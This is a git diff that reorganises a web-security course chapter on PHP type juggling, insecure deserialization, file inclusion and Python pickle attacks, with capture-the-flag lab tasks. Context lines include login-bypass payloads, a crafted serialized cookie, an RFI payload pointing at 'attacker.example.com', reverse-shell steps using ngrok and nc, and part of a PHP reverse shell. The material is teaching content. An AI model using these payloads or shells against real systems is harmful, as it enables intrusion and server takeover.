diff --git a/exotic-attacks/activities/breaking-hashes/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/README.md similarity index 96% rename from exotic-attacks/activities/breaking-hashes/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/README.md index fe41ba4a..7cf97de9 100644 --- a/exotic-attacks/activities/breaking-hashes/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/README.md @@ -28,4 +28,4 @@ A possible payload in POST data is: `username[]="8"&password[]=8&submit=Login` -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/breaking-hashes/deploy/.dockerignore b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/.dockerignore similarity index 100% rename from exotic-attacks/activities/breaking-hashes/deploy/.dockerignore rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/.dockerignore diff --git a/exotic-attacks/activities/breaking-hashes/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/breaking-hashes/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Dockerfile diff --git a/exotic-attacks/activities/breaking-hashes/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/breaking-hashes/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Makefile diff --git a/exotic-attacks/activities/breaking-hashes/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/flag similarity index 100% rename from exotic-attacks/activities/breaking-hashes/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/flag diff --git a/exotic-attacks/activities/breaking-hashes/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/breaking-hashes/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/solution/solution.sh diff --git a/exotic-attacks/activities/breaking-hashes/src/index-template.php b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/index-template.php similarity index 100% rename from exotic-attacks/activities/breaking-hashes/src/index-template.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/index-template.php diff --git a/exotic-attacks/activities/breaking-hashes/src/source.bak b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/source.bak similarity index 100% rename from exotic-attacks/activities/breaking-hashes/src/source.bak rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/source.bak diff --git a/exotic-attacks/activities/defaced-website/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/README.md similarity index 95% rename from exotic-attacks/activities/defaced-website/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/README.md index 43c41c3d..1f413fdc 100644 --- a/exotic-attacks/activities/defaced-website/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/README.md @@ -21,4 +21,4 @@ The final payload in POST data is: `username=QNKCDZO&password=&submit=Login` -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/defaced-website/deploy/.dockerignore b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/.dockerignore similarity index 100% rename from exotic-attacks/activities/defaced-website/deploy/.dockerignore rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/.dockerignore diff --git a/exotic-attacks/activities/defaced-website/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/defaced-website/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Dockerfile diff --git a/exotic-attacks/activities/defaced-website/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/defaced-website/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Makefile diff --git a/exotic-attacks/activities/defaced-website/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/flag similarity index 100% rename from exotic-attacks/activities/defaced-website/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/flag diff --git a/exotic-attacks/activities/defaced-website/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/defaced-website/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/solution/solution.sh diff --git a/exotic-attacks/activities/defaced-website/src/img/defaced.png b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/img/defaced.png similarity index 100% rename from exotic-attacks/activities/defaced-website/src/img/defaced.png rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/img/defaced.png diff --git a/exotic-attacks/activities/defaced-website/src/index-template.php b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/index-template.php similarity index 100% rename from exotic-attacks/activities/defaced-website/src/index-template.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/index-template.php diff --git a/exotic-attacks/activities/handy-tool/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/README.md similarity index 95% rename from exotic-attacks/activities/handy-tool/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/README.md index 6841437a..84273b43 100644 --- a/exotic-attacks/activities/handy-tool/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/README.md @@ -7,6 +7,7 @@ LFI + PHP Object Injection / PHP Insecure Object Deserialization + RCE ## Exploit The exploit involves opening a reverse shell. You'll need to: + 1. Create an account on [ngrok](https://ngrok.com/) (also confirm your email address). 2. Install `ngrok` on you machine. 3. Forward your 1234 port using: `ngrok tcp 1234`. A ngrok host and IP will be forwarded to your local port. @@ -26,8 +27,9 @@ You guessed it, the handy one is **Unserialize**. After inspecting the source code in the archive, you see what the serialized input object should look like. It has to be a PHP class with two attributes: - * `$condition` - boolean with the value `true` - * `$prop` - a string you can use for remote code execution on the server + +* `$condition` - boolean with the value `true` +* `$prop` - a string you can use for remote code execution on the server Since the actual output of the command is not shown, only the unserialized string, you should try to create a reverse shell. @@ -91,4 +93,4 @@ Now access `/backdoor.php` in the browser and you should have a shell in the `nc Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`. -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/handy-tool/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/handy-tool/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Dockerfile diff --git a/exotic-attacks/activities/handy-tool/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/handy-tool/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Makefile diff --git a/exotic-attacks/activities/handy-tool/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/flag similarity index 100% rename from exotic-attacks/activities/handy-tool/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/flag diff --git a/exotic-attacks/activities/handy-tool/sol/app.py b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/app.py similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/app.py rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/app.py diff --git a/exotic-attacks/activities/handy-tool/sol/backdoor_name.txt b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/backdoor_name.txt similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/backdoor_name.txt rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/backdoor_name.txt diff --git a/exotic-attacks/activities/handy-tool/sol/make_backdoor.php b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/make_backdoor.php similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/make_backdoor.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/make_backdoor.php diff --git a/exotic-attacks/activities/handy-tool/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/solution.sh diff --git a/exotic-attacks/activities/handy-tool/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/src/index.php similarity index 100% rename from exotic-attacks/activities/handy-tool/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/src/index.php diff --git a/exotic-attacks/activities/jar-of-pickles/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/README.md similarity index 97% rename from exotic-attacks/activities/jar-of-pickles/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/README.md index 5d04c00e..91bf057a 100644 --- a/exotic-attacks/activities/jar-of-pickles/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/README.md @@ -46,4 +46,4 @@ Make the request again. You should have a shell now in the `nc` terminal. Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`. -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/jar-of-pickles/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Dockerfile diff --git a/exotic-attacks/activities/jar-of-pickles/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Makefile diff --git a/exotic-attacks/activities/jar-of-pickles/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/flag similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/flag diff --git a/exotic-attacks/activities/jar-of-pickles/sol/payload.py b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/payload.py similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/sol/payload.py rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/payload.py diff --git a/exotic-attacks/activities/jar-of-pickles/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/solution.sh diff --git a/exotic-attacks/activities/jar-of-pickles/src/app.py b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/app.py similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/src/app.py rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/app.py diff --git a/exotic-attacks/activities/jar-of-pickles/src/static/img/jar-of-pickles.jpg b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/static/img/jar-of-pickles.jpg similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/src/static/img/jar-of-pickles.jpg rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/static/img/jar-of-pickles.jpg diff --git a/exotic-attacks/activities/jar-of-pickles/src/templates/index.html b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/templates/index.html similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/src/templates/index.html rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/templates/index.html diff --git a/exotic-attacks/activities/meme-uploader/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/README.md similarity index 95% rename from exotic-attacks/activities/meme-uploader/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/README.md index 2b9b6c96..03e8fd1e 100644 --- a/exotic-attacks/activities/meme-uploader/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/README.md @@ -23,4 +23,4 @@ Now navigate to: `/uploads/5c7dce216dceb5c1a61108e9db9fa835.php`. The flag should be in the page source (inspect it). -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/meme-uploader/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/meme-uploader/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Dockerfile diff --git a/exotic-attacks/activities/meme-uploader/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/meme-uploader/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Makefile diff --git a/exotic-attacks/activities/meme-uploader/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/flag similarity index 100% rename from exotic-attacks/activities/meme-uploader/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/flag diff --git a/exotic-attacks/activities/meme-uploader/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/meme-uploader/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/solution/solution.sh diff --git a/exotic-attacks/activities/meme-uploader/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/src/index.php similarity index 100% rename from exotic-attacks/activities/meme-uploader/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/src/index.php diff --git a/exotic-attacks/activities/pro-replacer/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/README.md similarity index 94% rename from exotic-attacks/activities/pro-replacer/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/README.md index 90a644a8..fbb0b5b1 100644 --- a/exotic-attacks/activities/pro-replacer/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/README.md @@ -33,4 +33,4 @@ Haystack: `m` Output: the flag -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/pro-replacer/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/pro-replacer/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Dockerfile diff --git a/exotic-attacks/activities/pro-replacer/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/pro-replacer/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Makefile diff --git a/exotic-attacks/activities/pro-replacer/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/flag similarity index 100% rename from exotic-attacks/activities/pro-replacer/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/flag diff --git a/exotic-attacks/activities/pro-replacer/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/pro-replacer/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/solution/solution.sh diff --git a/exotic-attacks/activities/pro-replacer/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/src/index.php similarity index 100% rename from exotic-attacks/activities/pro-replacer/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/src/index.php diff --git a/exotic-attacks/activities/todo-app/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/README.md similarity index 97% rename from exotic-attacks/activities/todo-app/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/README.md index 92a4a9be..adb4c95c 100644 --- a/exotic-attacks/activities/todo-app/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/README.md @@ -30,4 +30,4 @@ So we have to make a request with the result as cookie: `Cookie: todos=760463360e4919ca238d1566fc26661fa%3A1%3A%7Bi%3A0%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D` -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/todo-app/deploy/.dockerignore b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/.dockerignore similarity index 100% rename from exotic-attacks/activities/todo-app/deploy/.dockerignore rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/.dockerignore diff --git a/exotic-attacks/activities/todo-app/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/todo-app/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Dockerfile diff --git a/exotic-attacks/activities/todo-app/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/todo-app/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Makefile diff --git a/exotic-attacks/activities/todo-app/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/flag similarity index 100% rename from exotic-attacks/activities/todo-app/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/flag diff --git a/exotic-attacks/activities/todo-app/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/todo-app/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/solution/solution.sh diff --git a/exotic-attacks/activities/todo-app/src/flag-template.php b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/flag-template.php similarity index 100% rename from exotic-attacks/activities/todo-app/src/flag-template.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/flag-template.php diff --git a/exotic-attacks/activities/todo-app/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/index.php similarity index 100% rename from exotic-attacks/activities/todo-app/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/index.php diff --git a/exotic-attacks/activities/todo-app/src/license.txt b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/license.txt similarity index 100% rename from exotic-attacks/activities/todo-app/src/license.txt rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/license.txt diff --git a/exotic-attacks/activities/todo-app/src/payload.php b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/payload.php similarity index 100% rename from exotic-attacks/activities/todo-app/src/payload.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/payload.php diff --git a/exotic-attacks/assets/demo-php-serialize.php b/chapters/web-application-security/exotic-attacks/media/demo-php-serialize.php similarity index 100% rename from exotic-attacks/assets/demo-php-serialize.php rename to chapters/web-application-security/exotic-attacks/media/demo-php-serialize.php diff --git a/exotic-attacks/assets/demo-python-pickle.py b/chapters/web-application-security/exotic-attacks/media/demo-python-pickle.py similarity index 100% rename from exotic-attacks/assets/demo-python-pickle.py rename to chapters/web-application-security/exotic-attacks/media/demo-python-pickle.py diff --git a/exotic-attacks/assets/language-stats.png b/chapters/web-application-security/exotic-attacks/media/language-stats.png similarity index 100% rename from exotic-attacks/assets/language-stats.png rename to chapters/web-application-security/exotic-attacks/media/language-stats.png diff --git a/exotic-attacks/assets/loose-comparison.png b/chapters/web-application-security/exotic-attacks/media/loose-comparison.png similarity index 100% rename from exotic-attacks/assets/loose-comparison.png rename to chapters/web-application-security/exotic-attacks/media/loose-comparison.png diff --git a/exotic-attacks/assets/magic-hashes.png b/chapters/web-application-security/exotic-attacks/media/magic-hashes.png similarity index 100% rename from exotic-attacks/assets/magic-hashes.png rename to chapters/web-application-security/exotic-attacks/media/magic-hashes.png diff --git a/exotic-attacks/assets/strict-comparison.png b/chapters/web-application-security/exotic-attacks/media/strict-comparison.png similarity index 100% rename from exotic-attacks/assets/strict-comparison.png rename to chapters/web-application-security/exotic-attacks/media/strict-comparison.png diff --git a/exotic-attacks/assets/type-juggling.png b/chapters/web-application-security/exotic-attacks/media/type-juggling.png similarity index 100% rename from exotic-attacks/assets/type-juggling.png rename to chapters/web-application-security/exotic-attacks/media/type-juggling.png diff --git a/exotic-attacks/assets/version-stats.png b/chapters/web-application-security/exotic-attacks/media/version-stats.png similarity index 100% rename from exotic-attacks/assets/version-stats.png rename to chapters/web-application-security/exotic-attacks/media/version-stats.png diff --git a/exotic-attacks/assets/what-is-rfi-attack.png b/chapters/web-application-security/exotic-attacks/media/what-is-rfi-attack.png similarity index 100% rename from exotic-attacks/assets/what-is-rfi-attack.png rename to chapters/web-application-security/exotic-attacks/media/what-is-rfi-attack.png diff --git a/exotic-attacks/index.md b/chapters/web-application-security/exotic-attacks/reading/index.md similarity index 95% rename from exotic-attacks/index.md rename to chapters/web-application-security/exotic-attacks/reading/index.md index de92e901..535f5764 100644 --- a/exotic-attacks/index.md +++ b/chapters/web-application-security/exotic-attacks/reading/index.md @@ -13,14 +13,14 @@ The most common server-side language on the web today is still **PHP**. There are lots of legacy websites which used this language to begin with, and a complete refactor is just not worth it. Today, even if there are better options for the server-side choice, PHP is still pretty popular. -![Server Side Languages Popularity](./assets/language-stats.png) +![Server Side Languages Popularity](./media/language-stats.png) Source [here](https://w3techs.com/technologies/overview/programming_language). There are also lots of different PHP versions, each with its own vulnerabilities. A small insight into the distribution of versions across the web is: -![PHP Versions Popularity](./assets/version-stats.png) +![PHP Versions Popularity](./media/version-stats.png) Source [here](https://w3techs.com/technologies/details/pl-php). @@ -39,7 +39,7 @@ But this kind of flexibility sometimes causes unexpected errors in the program f In this section we will discuss **PHP type juggling** and how this can lead to authentication bypass vulnerabilities. -![Type Juggling examples](./assets/type-juggling.png) +![Type Juggling examples](./media/type-juggling.png) ## How PHP compares values @@ -88,7 +88,7 @@ The following tables showcase the difference between the two comparison modes: | Loose comparison | Strict comparison | | ------------------- | ------------------- | -| ![Loose comparison](./assets/loose-comparison.png) | ![Strict comparison](./assets/strict-comparison.png) | +| ![Loose comparison](./media/loose-comparison.png) | ![Strict comparison](./media/strict-comparison.png) | However, loose type comparison behavior like the one presented above is pretty common in PHP and many built-in functions work in the same way. You can probably already see how this can be very problematic, but how exactly can hackers exploit this behavior? @@ -393,7 +393,7 @@ Potential web security consequences of a successful **RFI** attack range from ** **Remote file inclusion** attacks usually occur when an application receives a path to a file as input for a web page and does not properly sanitize it. This allows an external URL to be supplied to the include function. -![RFI Attack](./assets/what-is-rfi-attack.png) +![RFI Attack](./media/what-is-rfi-attack.png) The above definitions are very similar, so what is the exact difference between the two of them and how does an exploit affect the web application in each case? @@ -446,7 +446,7 @@ Payload: `http://example.com/?file=http://attacker.example.com/evil.php` This means that getting a reverse shell on a web server will grant you only the rights of the user running the website. In order to get root access on the machine, further **privilege escalation** methods should be employed, which you will learn about in a future session. -### Example of a simple reverse shell in PHP: +### Example of a simple reverse shell in PHP ```php $sock, 1=>$sock, 2=>$sock), $pipes); ?> ``` + # Python Insecure Deserialization / `pickle` module We have looked at so many PHP vulnerabilities in this session, but you shouldn't be left with the impression that PHP is the only vulnerable language. @@ -507,6 +508,7 @@ Reading a bit further down in the docs we can see that implementing `__reduce__` When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or `None` can be provided as their value. The semantics of each item are in order: +> > * A callable object that will be called to create the initial version of the object. > * A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. [...] @@ -550,18 +552,18 @@ In conclusion, the code should be properly tested before being put in production # Further Reading -* https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf -* https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/ -* https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/ -* https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/ -* https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09 -* https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/ -* https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/ -* https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/ -* https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/ -* https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace -* https://www.whitehatsec.com/blog/magic-hashes/ -* https://davidhamann.de/2020/04/05/exploiting-python-pickle/ +* +* +* +* +* +* +* +* +* +* +* +* # Activities diff --git a/exotic-attacks/slides/Makefile b/chapters/web-application-security/exotic-attacks/slides/Makefile similarity index 100% rename from exotic-attacks/slides/Makefile rename to chapters/web-application-security/exotic-attacks/slides/Makefile diff --git a/exotic-attacks/slides/assets/language-stats.png b/chapters/web-application-security/exotic-attacks/slides/assets/language-stats.png similarity index 100% rename from exotic-attacks/slides/assets/language-stats.png rename to chapters/web-application-security/exotic-attacks/slides/assets/language-stats.png diff --git a/exotic-attacks/slides/assets/magic-hashes.png b/chapters/web-application-security/exotic-attacks/slides/assets/magic-hashes.png similarity index 100% rename from exotic-attacks/slides/assets/magic-hashes.png rename to chapters/web-application-security/exotic-attacks/slides/assets/magic-hashes.png diff --git a/exotic-attacks/slides/slides.md b/chapters/web-application-security/exotic-attacks/slides/slides.md similarity index 100% rename from exotic-attacks/slides/slides.md rename to chapters/web-application-security/exotic-attacks/slides/slides.md